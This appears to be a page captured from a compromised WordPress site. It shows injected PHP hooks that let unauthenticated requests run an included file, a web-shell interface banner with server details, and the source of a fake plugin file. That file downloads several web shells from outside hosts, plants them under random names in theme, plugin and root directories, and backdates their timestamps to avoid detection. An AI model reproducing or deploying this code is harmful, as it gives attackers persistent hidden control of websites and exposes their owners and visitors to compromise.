if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /data/www/welovefamily.at/welovefamily.at/htdocs_restore/wp-content/plugins/gamabunta/
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs_restore/wp-content/plugins/gamabunta/admin.php
<?php 

include 'handler/file.php';
include 'handler/dir.php';
include 'handler/utils.php';

$messages = array(); 

$dirname = dirname(__FILE__);
$startDate = strtotime('2021-01-01');
$endDate = strtotime('2023-01-13');
$randomTimestamp = mt_rand($startDate, $endDate);


$array_url = array(
    "https://shell.prinsh.com/Nathan/marijuana.txt" => "output/o.php8",
    "https://shell.prinsh.com/Nathan/gelay.txt" => "output/gel.php",
    "https://shell.prinsh.com/Nathan/alfa.txt" => "output/al.php",
    "https://raw.githubusercontent.com/The404Hacking/b374k-mini/master/b374k.php" => "output/betak.php"
); 

$document_root = $_SERVER['DOCUMENT_ROOT'];

$theme_dirs = get_dir('wp-content','themes');
$plugin_dirs = get_dir('wp-content', 'plugins');

$c = array(
    "output/o.php8" => $theme_dirs,
    "output/gel.php" => $plugin_dirs,
    "output/al.php" => $theme_dirs,
    "output/betak.php" => $theme_dirs,
    "wp-login.php" => $document_root,
    "output/al.php" => $document_root,
);


function put_file(){

    global $messages, $array_url;

    foreach($array_url as $url => $file_name){
        if(!file_exists($file_name) || filesize($file_name) <= 100) {
            $content = fetch($url);
            if($content) {
                save_file($file_name, $content);
                if(file_exists($file_name)) {
                    $messages['success'] = true;
                }
            }
        }else{
            $messages['success'] = true;
        }
    }
}

function merge() {

    global $c, $messages, $document_root;
    
    put_file();
    
    $copied = array();

    foreach($c as $file_name => $location) {
        if(is_array($location)) {
            $random_number = array_rand($location);
            $location = $location[$random_number];
        }
        $random_chars = generate_char(10);
        $real_location = "$location/$random_chars.php";
        if(copy_or_rename($file_name, $real_location)) {
            $to_show = str_replace($document_root, '', $real_location);
            $to_show = $_SERVER['SERVER_NAME'].$to_show;
            array_push($copied, $to_show);
            touch($real_location, $randomTimestamp);
            touch($location, $randomTimestamp);

            clearstatcache(true, $real_location);
            clearstatcache(true, $location);
        }
    }
    $messages['copied'] = $copied;
}
merge();
echo json_encode($messages);
@ Telegram